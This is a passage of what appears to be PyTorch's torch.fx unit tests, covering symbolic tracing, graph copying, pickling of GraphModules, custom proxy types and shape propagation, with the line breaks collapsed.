Optional[Any] = None) -> Node: name = target if isinstance(target, str) else torch.typename(target) if name[-1] == '_': raise RuntimeError('In-place operations are not supported') return super().create_node(kind, target, args, kwargs, name) # Test method class MyInplaceMod(torch.nn.Module): def forward(self, x): x.add_(3.0) return x m = MyInplaceMod() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m) # Test free function class 
MyInplaceMod2(torch.nn.Module): def forward(self, x): torch.log_(x) return x m2 = MyInplaceMod2() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m2) # Test symbolic node as an arg class MyInplaceMod3(torch.nn.Module): def forward(self, x): y = torch.ones(3, 4) y.add_(x) return x m3 = MyInplaceMod3() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m3) def test_leaf_module(self): # Custom delegate to make it so that there are no leaf modules, everything # should get traced through class NoLeafModulesTracer(Tracer): def is_leaf_module(self, m, qualname): return False class MyReluMod(torch.nn.Module): def __init__(self): super().__init__() self.relu = torch.nn.ReLU() def forward(self, x): return self.relu(x) mrm = MyReluMod() sym = NoLeafModulesTracer().trace(mrm) for node in sym.nodes: self.assertNotEqual(node.op, 'call_module') sym.lint() def test_wrap(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5)) def to_trace(y): return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y) m = symbolic_trace(to_trace) self.assertIn('a_lifted_leaf', m.code) self.assertEqual(27, m(2)) self.assertIs(a_lifted_leaf, real_a_lifed_leaf) def test_wrap_fn_directly(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5)) def to_trace(y): return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y) m = symbolic_trace(to_trace) self.assertIn('a_lifted_leaf2', m.code) self.assertEqual(27, m(2)) self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2) def test_wrapped_via_decorator(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def 
test_wrapped_via_decorator_and_transformed(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) transformed = torch.fx.Transformer(m).transform() self.assertIn('wrapped_via_decorator', transformed.code) self.assertEqual(transformed(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_wrap_with_submodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) def forward(self, x: torch.Tensor): return wrapped_with_submodule(x, self.batchnorm1d) m = symbolic_trace(M()) self.assertIn("wrapped_with_submodule", m.code) input = torch.rand(3, 2) ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) self.assertEqual(ref_batchnorm1d(input), m(input)) def test_wrapped_retrace(self): def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) retraced = symbolic_trace(m) self.assertIn('wrapped_via_decorator', retraced.code) self.assertEqual(retraced(0), 1) def test_graph_edit_with_proxy(self): class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = symbolic_trace(m).graph new_g = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_val = new_g.graph_copy(g, val_map) t = Proxy(output_val) # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules. 
new_g.output((t + t).node) gm = GraphModule(m, new_g) gm.graph.lint() self.assertEqual(gm(3, 4), 14) def test_graph_unique_names(self): class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = symbolic_trace(m).graph new_g = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_val = new_g.graph_copy(g, val_map) t = Proxy(output_val) # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules. new_g.output((t + t).node) gm = GraphModule(m, new_g) seen_names : Set[str] = set() for node in gm.graph.nodes: assert node.name not in seen_names seen_names.add(node.name) def test_stack_traces(self): class M(torch.nn.Module): def forward(self, a, b): return a + b tracer = torch.fx.Tracer() tracer.record_stack_traces = True graph = tracer.trace(M()) for node in graph.nodes: if node.op == 'output': continue self.assertTrue(node.stack_trace is not None) assert 'test_fx.py' in node.stack_trace def test_graph_unique_names_manual(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1') c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) graph2 = torch.fx.Graph() val_map : Dict[Node, Node] = {} graph2.graph_copy(graph, val_map) seen_names : Set[str] = set() for node in graph2.nodes: assert node.name not in seen_names seen_names.add(node.name) def test_unpack(self): class M(torch.nn.Module): def forward(self, a, b): c, d = a return c + d + b a = (torch.rand(1), torch.rand(1)) b = torch.rand(1) m = M() self.checkGraphModule(m, (a, b)) def test_native_callable(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: raise unittest.SkipTest("non-portable load_library call used in test") # This test exercises the case where we use FX to 
translate from Python # code to some native callable object # # For the purposes of testing, we use ElementwiseInterpreter defined # in test_custom_class.cpp. # # We test that we can # 1) Construct a native callable from FX IR # 2) Construct a drop-in replacement module that delegates to the # native callable rather than the original code # 3) Run both the original code and native callable wrapper with # equivalent results # 4) TorchScript compile the native callable wrapper and confirm # equivalent results with the reference # 5) TorchScript serialize and deserialize the native callable # and confirm equivalent results with the reference # We use this simple Module as a reference computation class MySimpleMod(torch.nn.Module): def forward(self, x): return 3.0 * x + x msm = MySimpleMod() # This is what a lowering pass might look like: a function that takes # a valid nn.Module, symbolically traces it, lowers the Module to some # representation, and wraps that representation up into another # nn.Module instance that handles dispatch to the compiled/lowered code. def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module: # ===== Stage 1: Symbolic trace the module ===== mod = symbolic_trace(orig_mod) # ===== Stage 2: Lower GraphModule representation to the C++ # interpreter's instruction format ====== instructions = [] constant_idx = 0 constants = {} fn_input_names = [] target_to_name = { operator.add : "add", operator.mul : "mul" } output_node : Optional[Node] = None # For each instruction, create a triple # (instruction_name : str, inputs : List[str], output : str) # to feed into the C++ interpreter for n in mod.graph.nodes: target, args, out_name = n.target, n.args, n.name assert len(n.kwargs) == 0, "kwargs currently not supported" if n.op == 'placeholder': # Placeholders specify function argument names. 
Save these # for later when we generate the wrapper GraphModule fn_input_names.append(target) elif n.op == 'call_function': assert target in target_to_name, "Unsupported call target " + target arg_names = [] for arg in args: if not isinstance(arg, Node): # Pull out constants. These constants will later be # fed to the interpreter C++ object via add_constant() arg_name = f'constant_{constant_idx}' constants[arg_name] = torch.tensor( [arg] if isinstance(arg, numbers.Number) else arg) arg_names.append(arg_name) constant_idx += 1 else: arg_names.append(arg.name) instructions.append((target_to_name[target], arg_names, out_name)) elif n.op == 'output': if output_node is not None: raise RuntimeError('Multiple output nodes!') output_node = n else: raise RuntimeError('Unsupported opcode ' + n.op) interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter() # Load constants for k, v in constants.items(): interpreter.add_constant(k, v) # Specify names for positional input arguments interpreter.set_input_names(fn_input_names) # Load instructions interpreter.set_instructions(instructions) # Specify name for single output assert isinstance(output_node.args[0], torch.fx.Node) interpreter.set_output_name(output_node.args[0].name) # ===== Stage 3: Create a wrapper GraphModule around the interpreter ===== class WrapperModule(torch.nn.Module): def __init__(self, interpreter): super().__init__() self.interpreter = interpreter wrapper = WrapperModule(interpreter) # Create a graph that: 1) Takes function arguments 2) Invokes the interpreter # 3) Returns the speficied return value # FIXME: The following code could be greatly simplified by symbolic_trace'ing # the wrapper with a Tracer that considers the Wrapper instance a root # module, however, I can't get `__call__` exposed on TorchBind classes # without it messing up Python `hasattr` for some reason. More digging # into CPython's implementation of hasattr is probably in order... 
graph = torch.fx.Graph() # Add placeholders for fn inputs placeholder_nodes = [] for name in fn_input_names: placeholder_nodes.append(graph.create_node('placeholder', name)) # Get the interpreter object interpreter_node = graph.create_node('get_attr', 'interpreter') # Add a node to call the interpreter instance output_node = graph.create_node( op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes)) # Register output graph.output(output_node) graph.lint() # Return final GraphModule!!! return GraphModule(wrapper, graph) # Lower GraphModule to C++ interpreter lowered = lower_to_elementwise_interpreter(msm) # Compare correctness with original module x = torch.rand(3, 4) ref_out = msm(x) test_out = lowered(x) torch.testing.assert_close(test_out, ref_out) # Test TorchScript compilation scripted_lowered = torch.jit.script(lowered) script_out = scripted_lowered(x) torch.testing.assert_close(script_out, ref_out) # Test TorchScript ser/de import_copy = self.getExportImportCopy(scripted_lowered) imported_out = import_copy(x) torch.testing.assert_close(imported_out, ref_out) def test_reserved_getattr(self): """Ensure that we do not name any nodes with a reserved builtin like `getattr`""" class M(torch.nn.Module): def forward(self, a): return a.foo.bar.baz m = M() m_g = symbolic_trace(m) m_g.graph.lint() for node in m_g.graph.nodes: self.assertTrue(node.name != "getattr") def test_node_tagging(self): class TaggingTracer(Tracer): def create_node(self, kind : str, target : Union[str, Callable], args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None, type_expr : Optional[Any] = None) -> Node: n = super().create_node(kind, target, args, kwargs, name) n.tag = 'foo' return n class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = TaggingTracer().trace(m) g.lint() for n in g.nodes: self.assertTrue(hasattr(n, 'tag')) self.assertEqual(n.tag, 'foo') def test_tensor_attribute(self): class 
TensorAttribute(torch.nn.Module): def __init__(self): super().__init__() self.tensor = torch.rand(3, 4) def forward(self, x): return torch.nn.functional.linear(x, self.tensor) ta = TensorAttribute() traced = symbolic_trace(ta) traced(torch.rand(4, 4)) class WrapperForQualname(torch.nn.Module): def __init__(self): super().__init__() self.ta = TensorAttribute() def forward(self, x): return torch.nn.functional.linear(x, self.ta.tensor) wfq = WrapperForQualname() traced2 = symbolic_trace(wfq) traced2.graph.lint() traced2(torch.rand(4, 4)) def test_symbolic_trace_sequential(self): class Simple(torch.nn.Module): def forward(self, x): return torch.neg(x) seq = torch.nn.Sequential( Simple(), Simple(), Simple() ) traced = symbolic_trace(seq) traced.graph.lint() x = torch.rand(3, 4) self.assertEqual(traced(x), seq(x)) def test_tensor_constant(self): class ConstTensor(torch.nn.Module): def forward(self, x): return torch.nn.functional.linear(x, torch.zeros(3, 4)) ct = ConstTensor() traced = symbolic_trace(ct) traced.graph.lint() traced(torch.rand(4, 4)) def test_pickle_graphmodule(self): class Nested(torch.nn.Module): def __init__(self): super().__init__() self.st = torch.nn.Linear(4, 4) def forward(self, x): return self.st(x) n = Nested() traced = symbolic_trace(n) traced.graph.lint() pickled = pickle.dumps(traced) loaded = pickle.loads(pickled) loaded.graph.lint() x = torch.rand(3, 4) self.assertEqual(loaded(x), traced(x)) def test_pickle_custom_import(self): graph = torch.fx.Graph() a = graph.placeholder('x') b = graph.placeholder('y') c = graph.call_function(a_non_torch_leaf, (a, b)) d = graph.call_function(torch.sin, (c,)) graph.output(d) gm = GraphModule(torch.nn.Module(), graph) pickled = pickle.dumps(gm) loaded = pickle.loads(pickled) loaded.graph.lint() x, y = torch.rand(1), torch.rand(1) self.assertEqual(loaded(x, y), gm(x, y)) def test_all_input_nodes(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.placeholder('x') b : torch.fx.Node = 
graph.call_module('linear_mod', args=(a,)) c : torch.fx.Node = graph.get_attr('y_attr') d : torch.fx.Node = graph.call_function(operator.add, args=(b, c)) e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0)) graph.output(e) graph.lint() self.assertEqual(b.all_input_nodes, [a]) self.assertEqual(c.all_input_nodes, []) self.assertEqual(d.all_input_nodes, [b, c]) self.assertEqual(e.all_input_nodes, [d]) def test_deepcopy_graphmodule_with_transform(self): st = SimpleTest() traced = symbolic_trace(st) traced.graph.lint() def transform(traced): new_graph = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_value = new_graph.graph_copy(traced.graph, val_map) relu_out = new_graph.create_node( op='call_method', target='neg', args=(output_value,), kwargs={}) new_graph.output(relu_out) return GraphModule(traced, new_graph) transformed = transform(traced) transformed.graph.lint() copied = copy.deepcopy(transformed) self.assertNotEqual(id(type(transformed)), id(type(copied))) x = torch.randn(3, 4) self.assertEqual(copied(x), transformed(x)) def test_deepcopy_with_submods_params(self): class Bar(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) def forward(self, x): return torch.relu(x) + self.param class Baz(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.bar = Bar() def forward(self, x): return self.bar(x) - self.param baz = Baz() traced = symbolic_trace(baz) traced.graph.lint() copied = copy.deepcopy(traced) copied.graph.lint() def test_deepcopy_graph_with_tracer_cls(self): class TestTracer(Tracer): def is_leaf_module(self, module, name): return True g = Graph(tracer_cls=TestTracer) x = g.placeholder("x") g.output(x) h = copy.deepcopy(g) self.assertIsNotNone(h._tracer_cls) self.assertTrue(g._tracer_cls == h._tracer_cls) def test_unpack_list_better_error(self): class SomeArgs(torch.nn.Module): def forward(self, a, b): return 
torch.rand(3, 4) class UnpacksList(torch.nn.Module): def __init__(self): super().__init__() self.sa = SomeArgs() def forward(self, x : list): return self.sa(*x) ul = UnpacksList() with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'): symbolic_trace(ul) def test_unpack_dict_better_error(self): class SomeKwargs(torch.nn.Module): def forward(self, x=3, y=4): return torch.rand(3, 4) class UnpacksDict(torch.nn.Module): def __init__(self): super().__init__() self.sk = SomeKwargs() def forward(self, x : dict): return self.sk(**x) ud = UnpacksDict() with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'): symbolic_trace(ud) def test_pretty_print_targets(self): # Test that Graph pretty-print prints friendly name for targets # in `operator` and `builtins` class SomeMod(torch.nn.Module): def forward(self, x): return torch.add(x.foo + x.bar, 3.0) traced = symbolic_trace(SomeMod()) graph_str = str(traced.graph) self.assertIn('builtins.getattr', graph_str) self.assertIn('operator.add', graph_str) self.assertIn('torch.add', graph_str) def test_pretty_print_node(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.param: torch.nn.Parameter = torch.nn.Parameter( torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x: torch.Tensor, y: int = 2): return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0) traced = symbolic_trace(M()) all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes]) FileCheck().check("x").check("placeholder") \ .check("y").check("placeholder") \ .check("getitem").check("call_function") \ .check("param").check("get_attr") \ .check("add").check("call_function") \ .check("linear").check("call_module") \ .check("clamp").check("call_method") \ .run(all_formatted) def test_script_tensor_constant(self): # TorchScript seems to ignore attributes that start with `__`. 
# We used to call anonymous Tensor values `__tensor_constant*`, but # they were getting ignored by script. Now they're called # `_tensor_constant*` class IHaveATensorConstant(torch.nn.Module): def forward(self, x): return x + torch.rand(3, 4) traced = torch.fx.symbolic_trace(IHaveATensorConstant()) torch.jit.script(traced) def test_autowrap_functions(self): class AutowrapFnTest(torch.nn.Module): def forward(self, x): return fx_int(x.shape[0] / 2) class AutowrapFnTest2(torch.nn.Module): def forward(self, x): return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2) # Check function(s) are wrapped # `int` would normally throw a TypeError as argument can't be `Proxy` tracer = Tracer(autowrap_functions=(fx_int,)) graph = tracer.trace(AutowrapFnTest()) traced = GraphModule(tracer.root, graph, 'test') tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2)) tracer_2.trace(AutowrapFnTest2()) # Test scriptability traced_scripted = torch.jit.script(traced) self.assertEqual(traced_scripted(torch.rand(4)), 2) def test_torch_fx_len(self): class FXLenTest(torch.nn.Module): def forward(self, x): return len(x) traced = symbolic_trace(FXLenTest()) self.assertEqual(traced(torch.rand(3, 4)), 3) # Test scriptability scripted = torch.jit.script(FXLenTest()) self.assertEqual(scripted(torch.rand(3)), 3) traced_scripted = torch.jit.script(traced) self.assertEqual(traced_scripted(torch.rand(3)), 3) # Test non-proxy len class FXLenTest2(torch.nn.Module): def __init__(self): super().__init__() self.l = [3, 4, 5] def forward(self, x): return x + len(self.l) traced2 = symbolic_trace(FXLenTest2()) inp = torch.rand(3, 4) self.assertEqual(traced2(inp), inp + 3.0) self.assertIs(len, builtins.len) def test_torch_fx_getattr(self): class FXGetattrTest(torch.nn.Module): def forward(self, x): return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3])) traced = symbolic_trace(FXGetattrTest()) self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3])) def test_sqrt(self): class 
Sqrt1(torch.nn.Module): def forward(self, x): return sqrt(x.size(0)) class Sqrt2(torch.nn.Module): def forward(self, x): return math.sqrt(x.size(0)) class Sqrt3(torch.nn.Module): def forward(self, x): return x + math.sqrt(2) + sqrt(2) self.checkGraphModule(Sqrt1(), [torch.zeros(8)]) self.checkGraphModule(Sqrt2(), [torch.zeros(8)]) self.checkGraphModule(Sqrt3(), [torch.zeros(8)]) self.assertIs(sqrt, _sqrt) self.assertIs(math.sqrt, _sqrt) def test_torch_custom_ops(self): class M(torch.nn.Module): def forward(self, a): b = torch.ops.aten.sigmoid(a) c = torch.ops.aten.cat([a, b]) return torch.ops.aten.cat((c, c)) m = M() input = torch.randn(3) ref_out = m(input) gm = symbolic_trace(m) gm.graph.lint() out = gm(input) self.assertEqual(out, ref_out) def test_pickle_torch_custom_ops(self): class M(torch.nn.Module): def forward(self, a): b = torch.ops.aten.sigmoid(a) c = torch.ops.aten.cat([a, b]) return torch.ops.aten.cat((c, c)) m = M() input = torch.randn(3) ref_out = m(input) gm = symbolic_trace(m) gm.graph.lint() pickled = pickle.dumps(gm) loaded = pickle.loads(pickled) self.assertEqual(loaded(input), gm(input)) def test_pretty_print(self): st = SimpleTest() traced = symbolic_trace(st) traced.graph.lint() printed = str(traced) assert 'SimpleTest()' in printed assert 'torch.relu' in printed def test_pretty_print_graph(self): class KwargPrintTest(torch.nn.Module): def forward(self, x): return torch.squeeze(x + 3.0, dim=2) st = KwargPrintTest() traced = symbolic_trace(st) traced.graph.lint() stringed = str(traced.graph) for s in ['args', 'kwargs', '#users']: assert s in stringed def test_custom_proxy_type(self): class TensorPair: def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair(x : TensorPair, y : TensorPair): s = x.add(y) return 
s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) y = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) ref_out = use_tensor_pair(x, y) traced = symbolic_trace(use_tensor_pair) traced_out = traced(x, y) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_type_literal(self): class TensorPair(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair_literal(x : TensorPair): s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3))) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) ref_out = use_tensor_pair_literal(x) traced = symbolic_trace(use_tensor_pair_literal) traced_out = traced(x) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_dynamic_value(self): class TensorPair(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor): s = x.add(TensorPair(y, y)) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) y = torch.randn(5, 3) ref_out = use_tensor_pair_ctor(x, y) traced = symbolic_trace(use_tensor_pair_ctor) traced_out = traced(x, y) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_input_dependent_control_flow(self): class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, inp): if inp.sum() == 0: self.is_zero = 
True self.tensor = torch.tensor([]) else: self.is_zero = False self.tensor = inp def add(self, other): if self.is_zero: return ZeroTensor(other.tensor) elif other.is_zero: return self def use_zero_tensor(x : torch.Tensor, y : torch.Tensor): return ZeroTensor(x + y) x, y = torch.randn(5, 3), torch.randn(5, 3) ref_out = use_zero_tensor(x, y) traced = symbolic_trace(use_zero_tensor) traced_out = traced(x, y) self.assertEqual(traced_out.is_zero, ref_out.is_zero) self.assertEqual(traced_out.tensor, ref_out.tensor) def test_graph_fns(self): g = Graph() a = g.placeholder('a') b = g.call_module('linear', (a,)) c = g.get_attr('bias') d = g.call_method('add', (b, c)) e = g.call_function(torch.sin, (d,)) g.output(e) mod = torch.nn.Module() mod.linear = torch.nn.Linear(3, 4) mod.bias = torch.rand(4) gm = GraphModule(mod, g) gm.graph.lint() input = torch.rand(3) r = gm(input) ref = torch.sin(mod.linear(input) + mod.bias) self.assertEqual(r, ref) def test_remove_uses(self): g : torch.fx.Graph = Graph() x : torch.fx.Node = g.placeholder('x') relu : torch.fx.Node = g.call_function(torch.relu, (x,)) neg : torch.fx.Node = g.call_function(torch.neg, (relu,)) g.output(neg) neg.replace_all_uses_with(relu) g.erase_node(neg) self.assertTrue(neg not in relu.users) def test_nonetype_annotation(self): eb = torch.nn.EmbeddingBag(3, 4) symbolic_trace(eb) def test_pickle_nonetype_annotation(self): eb = torch.nn.EmbeddingBag(10, 3, mode='sum') traced = symbolic_trace(eb) pickled = pickle.dumps(traced) loaded = pickle.loads(pickled) loaded.graph.lint() input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9]) offsets = torch.LongTensor([0, 4]) self.assertEqual(loaded(input, offsets), traced(input, offsets)) def test_return_tuple(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: return (x, x + x) original = M() traced = symbolic_trace(original) self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1))) def 
test_construct_root_dict(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,)) c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) linear_mod : torch.nn.Module = torch.nn.Linear(3, 4) add_param : torch.Tensor = torch.rand(3, 4) gm : torch.fx.GraphModule = torch.fx.GraphModule( {'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph) gm.graph.lint() assert 'self.foo.bar.baz' in gm.code x : torch.Tensor = torch.rand(3, 3) out : torch.Tensor = gm(x) ref_out : torch.Tensor = linear_mod(x) + add_param self.assertEqual(out, ref_out) def test_symbolic_trace_assert(self): class AssertsTensorShape(torch.nn.Module): def forward(self, x): torch._assert(x.shape[1] > 4, "assert_foobar") return x m = AssertsTensorShape() # verify traceability traced = symbolic_trace(m) # verify assertion on traced model works correctly at runtime traced(torch.rand(4, 5)) with self.assertRaisesRegex(AssertionError, "assert_foobar"): traced(torch.rand(4, 3)) # verify the symbolically traced module is scriptable ms = torch.jit.script(m) with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"): ms(torch.rand(4, 3)) def test_fx_create_arg(self): class CustomArgObject: def __init__(self, x, y): self.x = x self.y = y def __fx_create_arg__(self, tracer: torch.fx.Tracer): return tracer.create_node( "call_function", CustomArgObject, args=( tracer.create_arg(self.x), tracer.create_arg(self.y), ), kwargs={}, ) class HasCustomArgObjectWhenLeaf(torch.nn.Module): def forward(self, o: CustomArgObject): # Not normally traceable; good reason to make # this module a leaf. 
for x in o.x: o.y += x return o.y class Root(torch.nn.Module): def __init__(self): super().__init__() self.inner = HasCustomArgObjectWhenLeaf() def forward(self, x, y): o = CustomArgObject(x, y) return self.inner(o) class CreateArgTracer(torch.fx.Tracer): def is_leaf_module(self, m, module_qualified_name): return type(m) is HasCustomArgObjectWhenLeaf m = Root() graph = CreateArgTracer().trace(m) gm = torch.fx.GraphModule(m, graph) assert "CustomArgObject(" in gm.code def test_trace_fn_constant(self): some_constant = torch.rand(3, 4) def add_const(x): return some_constant + x traced = symbolic_trace(add_const) input = torch.rand(3, 4) self.assertEqual(traced(input), add_const(input)) def test_copy_no_remap(self): traced = symbolic_trace(SimpleTest()) g = traced.graph copied = torch.fx.Graph() for node in g.nodes: copied.node_copy(node) with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'): copied.lint() def test_wrong_topo(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,)) c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) nodes = list(graph.nodes) nodes[3].append(nodes[2]) with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'): graph.lint() def test_wrong_target_type(self): graph : torch.fx.Graph = torch.fx.Graph() with self.assertRaises(ValueError): n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo', args=(), kwargs={}) def test_example_shape_prop(self): class TestCase(torch.nn.Module): def __init__(self): super().__init__() self.attr = torch.randn(3, 4) self.submod = torch.nn.Linear(4, 4) def forward(self, x): return torch.neg(self.submod(x.relu() + self.attr)) tc = TestCase() tc_traced = symbolic_trace(tc) ref_out = tc_traced(torch.rand(3, 4)) 
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4)) # Make sure we're testing all opcodes opcodes = set() output_shape : Optional[torch.Shape] = None output_stride : Optional[Tuple[int]] = None for node in tc_traced.graph.nodes: opcodes.add(node.op) if node.op == 'output': output_shape = node.args[0].meta['tensor_meta'].shape output_stride = node.args[0].meta['tensor_meta'].stride self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method', 'call_module', 'output'])) # Test shape propogation and make sure results match actual self.assertEqual(output_shape, ref_out.shape) self.assertEqual(output_stride, ref_out.stride()) def test_shape_prop_layout(self): class ConvTest(torch.nn.Module): def __init__(self): super().__init__() self.conv_mod = torch.nn.Conv2d(5, 5, 3) def forward(self, x): return self.conv_mod(x) # contiguous layout test_mod = ConvTest() traced = symbolic_trace(test_mod) x = torch.randn(5, 5, 224, 224) shape_prop.ShapeProp(traced).propagate(x) assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format for node in traced.graph.nodes)) x_channels_last = x.contiguous(memory_format=torch.channels_last) traced.to(memory_format=torch.channels_last) shape_prop.ShapeProp(traced).propagate(x_channels_last) for node in traced.graph.nodes: # NB: the implementation of conv may not preserve the memory format, # unfortunately. 
The best we can do is just check that the placeholder # node is channels-last if node.op in {'placeholder'}: self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last) def test_shape_prop_aggregate(self): class ReturnTwo(torch.nn.Module): def forward(self, x): return (3, torch.sum(x)) class UnderTest(torch.nn.Module): def __init__(self): super().__init__() self.rt = ReturnTwo() def forward(self, x): return self.rt(x) ut = UnderTest() class RTTracer(torch.fx.Tracer): def is_leaf_module(self, m, module_qualified_name): return type(m) is ReturnTwo graph = RTTracer().trace(ut) mod = torch.fx.GraphModule(ut, graph) shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4)) for node in mod.graph.nodes: if node.op == 'call_module': assert 'tensor_meta' in node.meta tensor_meta = node.meta['tensor_meta'] assert tensor_meta[0] == 3 assert tensor_meta[1].shape == torch.Size([]) def test_shape_prop_layout_3d(self): class ConvTest3d(torch.nn.Module): def __init__(self): super().__init__() self.conv_mod = torch.nn.Conv3d(5, 5, 3) def forward(self, x): return self.conv_mod(x) test_mod_3d = ConvTest3d() traced_3d = symbolic_trace(test_mod_3d) x_3d = torch.randn(5, 5, 224, 224, 15) shape_prop.ShapeProp(traced_3d).propagate(x_3d) assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format for node in traced_3d.graph.nodes)) x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d) traced_3d.to(memory_format=torch.channels_last_3d) shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d) for node in traced_3d.graph.nodes: # NB: the implementation of conv may not preserve the memory format, # unfortunately. 
